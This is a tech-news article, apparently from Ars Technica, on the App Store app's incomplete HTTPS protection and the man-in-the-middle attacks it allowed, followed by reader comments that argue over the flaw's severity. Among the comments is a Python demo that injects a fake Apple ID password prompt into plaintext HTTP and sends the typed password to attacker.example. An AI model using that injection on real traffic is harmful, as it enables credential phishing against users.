For the past nine months—and possibly for years—Apple has unnecessarily left many of its iOS customers open to attack because engineers failed to implement standard technology that encrypts all traffic traveling between handsets and the company's App Store.

While HTTPS-encrypted communications have been used for years to prevent attackers from intercepting and manipulating sensitive traffic sent by online banks and merchants, the native iOS app that connects to Apple's App Store fully deployed the protection only recently. Elie Bursztein, a Google researcher who said he discovered the security hole in his spare time, said in a blog post published on Friday that he reported various iOS flaws to Apple's security team in July. His post gave no indication that the iOS app had ever fully used HTTPS, raising the possibility that this significant omission has been present for years. (Apple doesn't comment on security matters, so it's impossible for Ars to confirm the precise timeline or level of protection.)

As most Ars readers know, HTTPS is a basic security measure that's almost as old as the Web itself. It ensures that traffic traveling between an end-user and a webserver is encrypted. That prevents anyone who may have a connection between the two endpoints from listening in. HTTPS also provides cryptographic assurance that the server answering calls to itunes.apple.com truly belongs to Apple and not an impostor. Over the past five years, a growing roster of companies including Google, Facebook, and Twitter have begun offering end-to-end HTTPS, making it harder for attackers to use age-old exploits that bypass the measure. It's unclear why it has taken Apple so long to catch up.
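The two guarantees described above, encryption of the traffic and proof of the server's identity, can be made concrete with Python's standard `ssl` module. This is an illustrative sketch, not Apple's code; it simply shows that a properly configured TLS client refuses both unverified certificates and mismatched hostnames, while a client with those checks disabled is roughly as exposed as one speaking plain HTTP:

```python
import ssl

# A default client context enforces both HTTPS guarantees:
secure = ssl.create_default_context()
print(secure.verify_mode == ssl.CERT_REQUIRED)  # cert must chain to a trusted CA
print(secure.check_hostname)                    # cert must match e.g. itunes.apple.com

# Disabling those checks is effectively what plain HTTP gives you:
# any machine on the network path can impersonate the server.
insecure = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
insecure.check_hostname = False      # must be disabled before verify_mode
insecure.verify_mode = ssl.CERT_NONE
print(insecure.check_hostname)       # False: impostor servers go unnoticed
```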

Apple's failure to fully offer HTTPS to customers using its iOS app posed an unnecessary risk to anyone who has ever used an iPhone or iPad to download an app over an unsecured Wi-Fi connection. Attackers connected to the same network could use a variety of freely available tools and a clever social-engineering trick to retrieve passwords or other log-in credentials. Worse, they could set up fake App Stores that would serve counterfeit apps and upgrades instead of the ones normally delivered by Apple's legitimate store.

At various points in Bursztein's post, which was headlined "Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities," he said Apple recently "turned on HTTPS for the App Store." But later, he wrote: "By abusing the lack of encryption (HTTPS) in certain parts of the communication with the App Store, the dynamic nature of the App Store pages, and the lack of confirmation, an active network attacker can perform" various attacks. That last statement suggests that parts of the App Store were protected by HTTPS while other parts were not. Bursztein has produced several videos that demonstrate the types of damage malicious hackers could have inflicted. The one below shows how an attacker on the same unsecured network as victims could have tricked them into installing a fake upgrade.

iOS App Store fake upgrade attack.

Paul Ducklin, a researcher at antivirus provider Sophos, has more here on why HTTPS protection for the App Store is crucial.

It's great that Apple has finally updated its iOS App Store app to provide this basic protection across the entire site. But the work isn't over yet. SSL Labs, a report-card system from security firm Qualys that rates the quality of websites' HTTPS protections, gives Apple's App Store a failing grade. iOS users shouldn't worry too much, since the weaknesses Qualys detects aren't easy for the average hacker to exploit. Still, it shows Apple's engineers have more work to do to keep customers safe.

Story updated to change headline and first and second paragraph to add the words "fully" and "all." Language was also added to leave open the possibility that parts of the App Store were already HTTPS protected. Second and third paragraphs updated to change "protect" to "prevent" and add "almost" respectively.

I find this really hard to believe. Using OpenSSL or GnuTLS is not that difficult; what kind of people do these big companies hire? (The 2011 PlayStation Network hack springs to mind.)

Edit: the wording of the article was updated to largely obviate this comment

This article (probably because the original disclosure did not strongly emphasize the point) makes it sound like there was no HTTPS whatsoever. In fact, only the "critical" parts were encrypted, which weakens the purpose of HTTPS significantly. I'd bet you a dollar a bean counter looked at a risk assessment and said HTTPS was too expensive to implement for every resource rendered. Now researchers not beholden to corporate secrecy raise a fuss and embarrass them, and now they change.

As the original disclosure mentions in passing a few times, it's only some parts that are plaintext, but they are parts that, when maliciously replaced, can dramatically affect the application.

So, what malicious software might be installed due to this failure? It is really bad that the Apple Password is sent in plaintext (Update: Nothing of the sort happens). Anybody could nick my backup dump from an iOS device, take control of my @iCloud mail account (what sucker uses that anyway?), or wipe my devices.

I also don't love how iTunes links open up a floating window over other apps (such as RSS readers), instead of punting over to the proper app. That's an easy UI for a website to fake, and bam, my password is captured.

So the bug was fixed some time ago, no one was harmed, and you still complain about it for ad money.

Sure they do. It's the only thing you can say against Apple on the security side, while Android has had hundreds of security threats.

They won't tell you that a 0-day security hole in iOS is so hard to find that it's worth $500,000 on the exploit market, as Charlie Miller noted last week ...

Yesterday my friend was shocked to learn that you can do absolutely nothing to an iOS device, security-wise, without jailbreaking it. Needless to say, he is a supporter of "openness". +1 to your point.

This article implies that this attack enables password sniffing and malicious app installs.

Password sniffing is not necessarily possible, as it is not shown that passwords are sent in plaintext.

That's correct, password sniffing is not necessarily possible. The attacker would first have to convince the device to connect to a fake App Store (e.g., via DNS spoofing), which could then launch a social-engineering attack to make the user divulge her password. It's bad that this is possible, but not as bad as the article or the headline suggests.--m

What they did not do is use HTTPS for all data in and out of the app. This meant that with a MITM attack it was possible to show a fake login prompt using a different mechanism (notifications) and socially engineer the user into entering their password.

This was a failing on Apple's part.

However, you show the picture above and hint, below, that the app "never used HTTPS"

Quote:

His post gave no indication that the iOS app had ever used HTTPS, raising the possibility that this significant omission has been present for years.

This is simply not the case. The photo linked above is an image showing a fake login prompt, not actually an "ownable" real iOS App Store login dialog.

Your passwords sent through the App Store were protected. However, if a smart hijacker ran an incredibly sophisticated targeted attack against your particular device, it was possible for that attacker to try to trick you into entering your password by injecting resources to create a fake login dialog.

This has been patched already.

In the meantime arstechnica.com continues to send your login info in the clear. This seems like a bit of hypocrisy.

Passwords are _not_ being sent in plaintext, though you couldn't tell that from this poorly written article. It's not as bad as the way Ars sends plaintext passwords, as XolotlLoki pointed out.

Passwords can be exfiltrated, though, by intercepting content coming from the App Store and inserting dynamic code that prompts the user to enter their credentials and sends them out via a JavaScript URL inclusion. Elie explains the process well in the blog post: http://elie.im/blog/web/apple-finally-t ... TuSE-tAQnn

SSL connections would prevent this hack, but so would simply not executing arbitrary JavaScript coming from the App Store. There are ways to design systems more secure than this without wrapping absolutely everything in SSL.
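The "don't execute arbitrary JavaScript" mitigation amounts to sanitizing store content before rendering it. Here's a minimal illustrative sketch in Python (a real iOS client would do this natively, and robust sanitizers handle far more cases); it drops `<script>` elements from an HTML fragment while keeping everything else:

```python
from html.parser import HTMLParser

class ScriptStripper(HTMLParser):
    """Rebuild an HTML fragment, discarding <script> elements entirely."""
    def __init__(self):
        super().__init__()
        self.out = []
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            return
        attr_text = "".join(
            f" {k}" if v is None else f' {k}="{v}"' for k, v in attrs
        )
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text inside a <script> block is the payload; drop it.
        if not self.in_script:
            self.out.append(data)

def strip_scripts(html: str) -> str:
    parser = ScriptStripper()
    parser.feed(html)
    return "".join(parser.out)

# An injected fake-login payload never reaches the renderer:
print(strip_scripts('<p>Store page</p><script>stealPassword()</script>'))
# → <p>Store page</p>
```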

The article has been updated to make clear that the unnecessary risk posed to iOS users was the result of *incomplete* HTTPS protection for the App Store. For the record, Bursztein's blog post is headlined "Apple finally turns HTTPS on for the App Store, fixing a lot of vulnerabilities," and in the first paragraph it states "Last week Apple finally issued a fix for it and turned on HTTPS for the App Store."

Later in the article, Bursztein goes on to say "By abusing the lack of encryption (HTTPS) in *certain parts* of the communication with the App Store, the dynamic nature of the App Store pages, and the lack of confirmation, an active network attacker can perform the following attacks:" [emphasis mine] It goes on to list password stealing, app swapping, fake app updates, preventing application installation, and privacy leaks.

While the researcher doesn't specifically say so, this all but assures that parts of the App Store were previously protected by HTTPS.

My sincere apologies that this post wasn't clear on this point. The bottom line remains: For months or years some iOS users have been unnecessarily exposed to risk because Apple didn't implement industry-standard protections in the App Store.

Dan, it seems like your "correction" or "clarification" is based entirely on the original article/blog you are reporting on.

The article you are reporting on in theory should not be the only source of your information. And if we're going to be completely honest about full disclosure, the original article you are reporting on was written by an employee of a competitor of Apple.

Now, I think that researchers are probably motivated by academic concerns, but if you published an article that said "Microsoft Researchers show Google is insecure" it might make sense to take a look at the motivations behind those researchers' paychecks. And perhaps do a bit of research beyond just reading the headline and first sentence of their blog post.

Google is a direct competitor to Apple. You may hate Apple, love Apple, or feel indifferent, but you have to acknowledge the two companies have a vested interest in making each others' mobile application/store platforms look bad.

And in this case the original lede of your article was misleading. If the blog post you based the article on was equally misleading, I'm not sure that's a good excuse.

The article you are reporting on in theory should not be the only source of your information. And if we're going to be completely honest about full disclosure, the original article you are reporting on was written by an employee of a competitor of Apple.

The lack of clarity in the original Ars writeup was made possible by Apple's refusal to comment on security issues. The corrected Ars article carefully separates conjecture from fact. Readers were correct to point this out.

However, writing an article based on a "sole source" is fine, particularly when the subject of that source article (i.e., Apple) has validated the source's primary claim and when that source is able to demonstrate (i.e., through testing) that the claim has merit.

For the past nine months—and possibly for years—Apple has unnecessarily left many of its iOS customers open to attack because engineers failed to implement standard technology that encrypts all traffic traveling between handsets and the company's App Store.

Do you really think those weasel words remove the impression that credentials are being sent in plain text?

Here, let me fix that for you.

"Apple enables HTTPS for all App Store data exchanges

Unlike Ars, which sends your password completely unsecured, Apple has always used HTTPS to protect user accounts, passwords, and monetary transactions. However, some data exchanges, such as those that occur when the user is browsing the store looking at the descriptions of apps they do not yet have, were not encrypted. This will now change with Apple turning on HTTPS for every possible data exchange with the App Store."

Instead of seeing the previous "insecure" implementation as a threat, I see a possibility: set up your own "App Store", install any app you like without jailbreaking...

I should also point out, as I often do on articles with FUD about other OSes, that if no one got hurt we can't really claim there was any security flaw in Apple's previous implementation. With such a widespread OS, if there were ANY real danger whatsoever, we would have heard about at least some people getting scammed, hacked, etc. Since we have never heard a single report or testimonial from a single person, we can assume that the exploit was either too difficult to use or too obscure to discover, and that it didn't really matter (or maybe didn't really exist).

You cannot install "fake" updates to an app unless they are signed with private keys that are generally well protected.

He says "some" parts of the store are encrypted. I'm willing to bet the encrypted parts are everything that needs to be encrypted, such as your password and credit card details.

Until someone proves otherwise, I'm going to assume everything that needs SSL has it, and everything that doesn't need SSL (such as the executable code you download from the store) does not have it.

The encryption system built into binary code on iOS is very similar to SSL and just as strong. If you can break that (such as by accessing the private keys, or if the user has jailbroken their device) then you can also break SSL (which is not perfect).
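The commenter's underlying point, that a forged update should fail verification before it can be installed, can be illustrated with a toy stand-in. Real iOS code signing uses asymmetric (public-key) signatures issued by Apple; the sketch below substitutes an HMAC with a hypothetical vendor-held key purely to show the verify-before-install flow:

```python
import hashlib
import hmac

# Hypothetical secret standing in for a vendor's signing key; iOS actually
# uses Apple's asymmetric keys, which never leave Apple's control.
VENDOR_KEY = b"held-only-by-the-vendor"

def sign_update(binary: bytes) -> bytes:
    """Produce a signature only the key holder can generate."""
    return hmac.new(VENDOR_KEY, binary, hashlib.sha256).digest()

def verify_update(binary: bytes, signature: bytes) -> bool:
    """Refuse to install anything whose signature doesn't check out."""
    expected = hmac.new(VENDOR_KEY, binary, hashlib.sha256).digest()
    return hmac.compare_digest(expected, signature)

genuine = b"app-binary-v2.0"
sig = sign_update(genuine)
print(verify_update(genuine, sig))             # True: legitimate update
print(verify_update(b"trojaned-binary", sig))  # False: swapped-in fake is rejected
```

This is why a MITM attacker who can replace unencrypted store pages still cannot push runnable malware: without the signing key, any substituted binary fails this check.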

Editors should have pulled this article. It is an embarrassment for Ars. Inserting a couple of qualifying words, "fully" and "all," in a few places does not undo the overall slant of the article, which is to imply much more danger than truly exists.

Re-reading the article after the comments is an eye-opener. Dan, you should rewrite this from scratch.

You cannot install "fake" updates to an app unless they are signed with private keys that are generally well protected.

He says "some" parts of the store are encrypted. I'm willing to bet the encrypted parts are everything that needs to be encrypted, such as your password and credit card details.

No, there used to be a real vulnerability here.

The App Store application can be basically thought of as a web browser. It shows content.

It turns out that through a MITM attack it was possible to capture the traffic between the App Store application and the actual App Store server. You couldn't capture any HTTPS traffic like usernames, passwords, etc, but you could add your own content.

Adding your own content is an exploit of HTTPS/SSL connections going the other way from what people usually think of. You're not capturing the user's traffic, you're adding in extra content from the server, that is not actually real content.

This sort of MITM attack can be thought of as similar to a cross site scripting vulnerability, in a lot of ways.

The Google researcher hooked up a server to the iPad, and injected his own javascript code into the traffic for the landing page of the App Store application. This popped up a dialog of his choosing.

The javascript dialog could ask for anything - social security number, hair color, weight, height, but in this case the researcher made it look similar (though not identical) to the password dialog, and asked for the user's password.

If the user typed their password into this injected javascript dialog box (again, think about a web browser), it would send that password to the MITM server.

This kind of attack is partly because the App Store application wasn't using SSL for the page content to verify it was coming from the right server, and partly because the App Store application lets you execute arbitrary javascript (this probably is not necessary and might be removed as an unnecessary feature of this "browser").
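The injection step described above can be sketched in a few lines. Over plain HTTP, a machine in the middle can rewrite any response before forwarding it; the payload and the `attacker.example` host below are placeholders invented for illustration, not the researcher's actual code:

```python
# Hypothetical payload mimicking the fake password prompt: a dialog asks
# for the password, then leaks it via an image request to the MITM server.
FAKE_PROMPT = (
    '<script>'
    'var p = prompt("Apple ID password required");'
    'new Image().src = "http://attacker.example/?p=" + encodeURIComponent(p);'
    '</script>'
)

def inject(page: str, payload: str = FAKE_PROMPT) -> str:
    """Splice attacker markup into a plaintext HTTP response in transit.
    HTTPS defeats this: a tampered stream fails integrity checks and the
    client drops the connection instead of rendering it."""
    if "</body>" in page:
        return page.replace("</body>", payload + "</body>", 1)
    return page + payload

tampered = inject("<html><body>App Store landing page</body></html>")
print(FAKE_PROMPT in tampered)  # True: the fake dialog now ships with the page
```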

There are other "attacks" possible or ways to screw things up by injecting content into the App Store. However, unlike the password javascript dialog, most would simply cause crashing, buggy behavior, or just go away completely the next time the user opened the App Store app (without the MITM server).

Critically, you have to own the Wi-Fi connection or have a MITM server, identify the App Store traffic and devices, and control everything in the chain for this to work. Also, it seems that originally there was no way to get the App Store account name (unless you popped up another javascript dialog asking for that info). So you'd have a password but no username.

It was a real vulnerability, Apple fixed it, but it wasn't anything like the article originally suggested (which was cleartext username/password transmission).

The App Store application can be basically thought of as a web browser. It shows content.

It turns out that through a MITM attack it was possible to capture the traffic between the App Store application and the actual App Store server. You couldn't capture any HTTPS traffic like usernames, passwords, etc, but you could add your own content.

Just like you could add content to pretty much any other website anybody visits via the same technique. Just because it's the app store instead of arstechnica.com doesn't make any difference.

The Ugly wrote:

The Google researcher hooked up a server to the iPad, and injected his own javascript code into the traffic for the landing page of the App Store application. This popped up a dialog of his choosing.

The javascript dialog could ask for anything - social security number, hair color, weight, height, but in this case the researcher made it look similar (though not identical) to the password dialog, and asked for the user's password.

If the user typed their password into this injected javascript dialog box (again, think about a web browser), it would send that password to the MITM server.

Don't just think "like" a web browser; it is a web browser. Always has been. You could do the same thing at arstechnica.com.

The Ugly wrote:

This kind of attack is partly because the App Store application wasn't using SSL for the page content to verify it was coming from the right server, and partly because the App Store application lets you execute arbitrary javascript (this probably is not necessary and might be removed as an unnecessary feature of this "browser").

I understand that. I've been writing software professionally for a decade and virtually everything I've ever written involves the web or iOS.

The Ugly wrote:

It was a real vulnerability, Apple fixed it, but it wasn't anything like the article originally suggested (which was cleartext username/password transmission).

The article also suggested you could distribute malware, which was never true. That's what I was mostly referring to, and why I think this article should see judicious use of the <strike> tag and a follow-up apology written by someone who actually knows what they're talking about.

It's nice that they switched to SSL; everybody should be using SSL. But the industry standard is not to use SSL, and Apple is simply doing the same as everyone else in the world.

Having read the article and the comments so far, I have to agree that this article is poorly written, even after the edits. The two images, one showing a password that says "owned" and the other a fake app update, implicitly led me to think that this exploit would allow someone to "own" my iOS device and install any software on it.* I don't see either of these being possible. The risk of giving up my password to a socially engineered MITM attack is not inconsequential, but it's nowhere close to the overly dramatic and grossly misleading images and story. I will credit the commenters for being mostly informative and well written. Thank you all for the constructive dialog; it makes me want to return to Ars, unlike the article. The article should be completely rewritten.

* Though it might be possible for someone to install an app, there is no indication that it would have the signatures needed to run, so at most this attack would render an app inoperable.